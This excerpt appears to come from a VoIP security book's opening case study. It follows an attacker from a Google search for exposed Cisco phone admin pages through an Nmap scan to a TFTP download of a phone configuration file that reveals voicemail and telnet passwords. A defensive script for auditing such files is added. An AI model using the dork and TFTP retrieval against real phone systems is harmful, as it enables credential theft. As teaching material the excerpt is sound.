Part I: Casing the Establishment

Chapter List

Chapter 1: Footprinting a VoIP Network
Chapter 2: Scanning a VoIP Network
Chapter 3: Enumerating a VoIP Network

Case Study: My VOIP Gear is Secure From Outsiders, Right?

Many of VoIP's security issues are similar to those of Internet applications installed in your enterprise. This similarity is mostly due to the fact that VoIP devices inherit so many of the traditional security vulnerabilities of the supporting services and infrastructure around them. Another reason is that VoIP phones and servers tend to support a wide range of features including HTTP, telnet, SNMP, TFTP, and the list goes on.

Because VoIP components typically support such a variety of administrative protocols, an attacker's basic network reconnaissance becomes much simpler. Believe it or not, simply using Google can lead to a treasure trove of information about your VoIP network.

Lock and Load with Google

When performing reconnaissance on a potential target, there are a variety of ways an attacker can leverage search engines simply by using the advanced features of a service such as Google. First, an attacker scours your company's job listings to see if any juicy details can be unearthed; lo and behold, he comes up with a job listing for "Cisco VoIP Engineer."

Leveraging this bit of information, he then dusts off his Google hacking skills to determine if any of your Cisco VoIP phones are exposed to the Internet. Because Google will index anything with a web service, it turns out that many VoIP phones are inadvertently advertised on the Internet because of their built-in web servers. The attacker types the following into a Google search:

    inurl:"NetworkConfiguration" cisco site:yourcompany.com

He comes up with three hits:

    Results 1 - 3 of 3 for "NetworkConfiguration" cisco site:yourcompany.com (0.10 seconds).

The hacker has just found the administrative web interface to three of your Cisco IP phones that were mistakenly left exposed to the Internet. As it turns out, without even needing a password, simply clicking any of these hits gives the hacker a wealth of information:

    DHCP Server
    BOOTP Server        No
    MAC Address         001120017EA3
    Host Name           gk002020036ea3
    Domain Name
    IP Address
    Default Router
    Subnet Mask
    TFTP Server 1
    NTP Server 1
    NTP Server 2
    DNS Server 1
    DNS Server 2
    Alt NTP Server 1
    Alt NTP Server 2

Probing and Enumerating Our Way to Success

Most VoIP phones check and download their configuration files after each reboot from a central TFTP server. Now that the attacker knows an IP address of a TFTP server from his Google hacking of the Cisco phones, he can check to see if that server is also accessible from the Internet:

    C:\>ping

    Pinging [] with 32 bytes of data:

    Reply from bytes=32 time=20ms TTL=54
    Reply from bytes=32 time=21ms TTL=54
    Reply from bytes=32 time=22ms TTL=55
    Reply from bytes=32 time=21ms TTL=54

    Ping statistics for
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 20ms, Maximum = 22ms, Average = 21ms

Good news for the attacker: he can reach the TFTP server remotely without having to gain any further access to your network. Next, to confirm that the TFTP port itself is accessible, he fires up his copy of Nmap with a simple UDP scan:

    Starting Nmap 4.01 ( at 2006-02-20 05:26 EST
    Interesting ports on ( (
    (The 1473 ports scanned but not shown below are in state: closed)
    PORT      STATE   SERVICE
    67/udp    open    dhcpserver
    69/udp    open    tftp
    111/udp   open    rpcbind
    123/udp   open    ntp
    784/udp   open    unknown
    5060/udp  open    sip
    32768/udp open    omad

Sure enough, UDP port 69 (TFTP) is wide open for the attacker to start running queries against. TFTP offers no directory listing, so the attacker is looking specifically for configuration files whose exact names he knows; otherwise, he won't be able to retrieve them.

Thanks to his previous Google hacking exercise, the attacker uses the MAC address of the Cisco phone to predict the configuration filename to download:

    [root@attacker]# tftp
    tftp> get SEP001120017EA3.cnf

Success! Now the attacker can read the configuration file for the SIP phone he just downloaded:

    [root@attacker]# cat SEP001120017EA3.cnf
    # SIP Configuration Generic File (start)

    # Line 1 Settings
    line1_name: "502"                       ; Line 1 Extension\User ID
    line1_displayname: "502"                ; Line 1 Display Name
    line1_authname: "502"                   ; Line 1 Registration Authentication
    line1_password: "1234"                  ; Line 1 Registration Password

    # Line 2 Settings
    line2_name: ""                          ; Line 2 Extension\User ID
    line2_displayname: ""                   ; Line 2 Display Name
    line2_authname: "UNPROVISIONED"         ; Line 2 Registration Authentication
    line2_password: "UNPROVISIONED"         ; Line 2 Registration Password

    # Line 3 Settings
    line3_name: ""                          ; Line 3 Extension\User ID
    line3_displayname: ""                   ; Line 3 Display Name
    line3_authname: "UNPROVISIONED"         ; Line 3 Registration Authentication
    line3_password: "UNPROVISIONED"         ; Line 3 Registration Password

    # Line 4 Settings
    line4_name: ""                          ; Line 4 Extension\User ID
    line4_displayname: ""                   ; Line 4 Display Name
    line4_authname: "UNPROVISIONED"         ; Line 4 Registration Authentication
    line4_password: "UNPROVISIONED"         ; Line 4 Registration Password

    # Line 5 Settings
    line5_name: ""                          ; Line 5 Extension\User ID
    line5_displayname: ""                   ; Line 5 Display Name
    line5_authname: "UNPROVISIONED"         ; Line 5 Registration Authentication
    line5_password: "UNPROVISIONED"         ; Line 5 Registration Password

    # Line 6 Settings
    line6_name: ""                          ; Line 6 Extension\User ID
    line6_displayname: ""                   ; Line 6 Display Name
    line6_authname: "UNPROVISIONED"         ; Line 6 Registration Authentication
    line6_password: "UNPROVISIONED"         ; Line 6 Registration Password

    # NAT/Firewall Traversal
    nat_address: ""
    voip_control_port: "5060"
    start_media_port: "16384"
    end_media_port:  "32766"

    # Phone Label (Text desired to be displayed in upper right corner)
    phone_label: "cisco 7960"               ; Has no effect on SIP messaging

    # Time Zone phone will reside in
    time_zone: EST

    # Phone prompt/password for telnet/console session
    phone_prompt: "Cisco7960"               ; Telnet/Console Prompt
    phone_password: "abc"                   ; Telnet/Console Password

    # SIP Configuration Generic File (stop)

As you can see, the attacker now has access to the particular phone user's extension (502), her voicemail password (1234), and finally the administrative telnet password to her phone (abc). Using these details, there is no limit to the mischief that the attacker can perform.
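The check an administrator would want after reading a file like the one above, as an added example that is not the book's own code: a parser for the `key: "value" ; comment` layout of the SEP<MAC>.cnf file, the MAC-to-filename rule the phones follow, and an audit that flags every cleartext or weak line and console password so the files served from a TFTP root can be reviewed before they leak. The sample configuration is constructed to mirror the one shown.

```python
import re
# Constructed sample mirroring the layout of the SEP<MAC>.cnf file shown above
SAMPLE_CNF = """\
# SIP Configuration Generic File (start)
line1_name: "502"                       ; Line 1 Extension\\User ID
line1_authname: "502"                   ; Line 1 Registration Authentication
line1_password: "1234"                  ; Line 1 Registration Password
line2_password: "UNPROVISIONED"         ; Line 2 Registration Password
nat_address: ""
voip_control_port: "5060"
time_zone: EST
phone_password: "abc"                   ; Telnet/Console Password
# SIP Configuration Generic File (stop)
"""

# key: "quoted value" or bare value; anything after the value (the ; comment) is ignored
ENTRY_RE = re.compile(r'^\s*([A-Za-z0-9_]+)\s*:\s*(?:"([^"]*)"|(\S+))')

def parse_cnf(text):
    """Parse the .cnf settings into a dict; '#' lines and blanks are skipped."""
    settings = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ENTRY_RE.match(line)
        if m:
            settings[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return settings

def config_filename(mac):
    """Name of the per-phone file a Cisco SIP phone requests over TFTP: SEP<MAC>.cnf."""
    hexmac = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(hexmac) != 12:
        raise ValueError("MAC address must contain 12 hex digits")
    return f"SEP{hexmac}.cnf"

def audit_cnf(settings):
    """Report every provisioned password; mark it weak if numeric, short, or equal to the auth name."""
    findings = []
    for key in sorted(k for k in settings if k.endswith("_password")):
        value = settings[key]
        if value in ("", "UNPROVISIONED"):
            continue                      # unused line, nothing to steal
        user = settings.get(key[:-len("_password")] + "_authname", "console")
        if value == user or value.isdigit() or len(value) < 8:
            findings.append(f"{key}: weak credential for {user}")
        else:
            findings.append(f"{key}: cleartext credential for {user}")
    return findings
```

Run `audit_cnf(parse_cnf(open(path).read()))` over each SEP*.cnf in the TFTP root; any finding at all means the file must not be reachable from outside the voice network, and a "weak" finding means the credential should be changed as well.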

As you will learn in the following chapters, there is a wealth of information that can be gleaned remotely using standard security reconnaissance techniques. To an attacker, footprinting, scanning, and enumeration are all valuable endeavors that will typically yield the information necessary to perform more advanced attacks.

Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions
ISBN: 0072263644
Year: 2004
Pages: 158